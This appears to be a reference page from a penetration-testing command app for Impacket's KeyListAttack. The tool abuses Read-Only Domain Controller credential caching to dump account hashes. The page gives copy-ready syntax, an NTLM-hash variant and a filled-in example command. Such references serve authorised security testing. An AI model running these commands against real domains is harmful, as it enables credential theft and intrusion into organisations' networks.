Impacket KeyListAttack

Abuse RODC (Read-Only DC) credential caching to retrieve hashes for accounts cached on the RODC

Tool
impacket-keylistattack
Category
Credential Attacks / Kerberoasting
Platform
linux
Requires
password
Protocols
KERBEROS

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-keylistattack -rodcNo '<rodc_number>' -rodcKey '<aes_key>' '<domain>/<user>:<password>' -dc-ip '<ip>' -full-scan

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-keylistattack -rodcNo '<rodc_number>' -rodcKey '<aes_key>' -hashes ':<hash>' '<domain>/<user>' -dc-ip '<ip>' -full-scan

Examples

impacket-keylistattack -rodcNo '17185' -rodcKey 'aabbcc...' 'CORP.LOCAL/rodcadmin:password' -dc-ip '192.168.1.100' -full-scan

Tags

impacket rodc keylist credential-dumping kerberos